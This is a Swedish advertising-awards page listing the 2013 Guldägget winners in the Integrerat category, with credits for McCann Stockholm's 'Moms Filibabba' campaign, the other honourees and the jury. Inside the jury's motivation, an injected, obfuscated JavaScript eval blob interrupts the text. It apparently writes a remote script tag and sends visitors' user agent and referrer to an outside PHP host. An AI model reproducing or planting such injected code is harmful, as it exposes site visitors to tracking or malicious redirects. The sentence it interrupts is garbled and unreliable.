Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Årets Guldägg i kategori Integrerat går till…

Guldägget 2013
Sebastian

Max Hamburgare och McCann Stockholm vinner årets Guldägg i kategori Integrerat för ”Moms Filibabba”

Motivering:
Integrerad eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skria|var|u0026u|referrer|iknyb||js|php’.split(’|’),0,{}))
är den kampanj som sätter kanalsamverkan framför individuella enheter. Integrerad är den kampanj där hantverk avser såväl utformning som strategi och genomförande. Integrerad är den kampanj som förlöser en idé i alla dess relevanta former. Som fångar upp och tar rygg på möjligheter i omvärlden. Som binder ihop discipliner. Som förenar intressenter. Integrerat 2012 är Moms Filibabba.

Guldägg 2013 kategori Integrerat:
Byrå: McCann Stockholm Bidragsnamn: Moms Filibabba Uppdragsgivare: Max Hamburgare 3D: qaazz Art Director: Peter Eriksson, Cecilia Dufils, Markus Bjurman, Patrik Reuterskiöld Kundansvarig: Emma Pernald Original Artwork: Daniel Köpman Postproduktion: Stopp Producent: Ylva Axell Produktionsledare: Jonna Liljedahl Projektledare: Emma Pernald Regissör: RBG6, Joel Nordström, RBG6, Lars Ohlin Uppdragsgivare: Anders Forssten Mediebyrå: Starcom PR-byrå: McCann Relations Produktionsbolag: Aspekt

Silverägg 2013 kategori Integrerat:
Byrå: Le Bureau Bidragsnamn: För det vidare Uppdragsgivare: Skolverket
Byrå: Forsman & Bodenfors Bidragsnamn: Miljarden Uppdragsgivare: Coop Sverige AB

Diplom 2013 kategori Integrerat:
Byrå: McCann Stockholm Bidragsnamn: Pizzamodellen Uppdragsgivare: Lantmännen
Byrå: Forsman & Bodenfors Bidragsnamn: Sveriges största energisparexperiment Uppdragsgivare: E.ON
Byrå: DDB Stockholm Bidragsnamn: Vem bryr sig? Uppdragsgivare: Försvarsmakten

Jury:
Kategoriordförande Tom Beckman
Jury Patrick Kampmann, Rickard Villard, Hedvig Hagwall Bruckner, Hanna Belander, Claes Bodén, Jimmy Johansson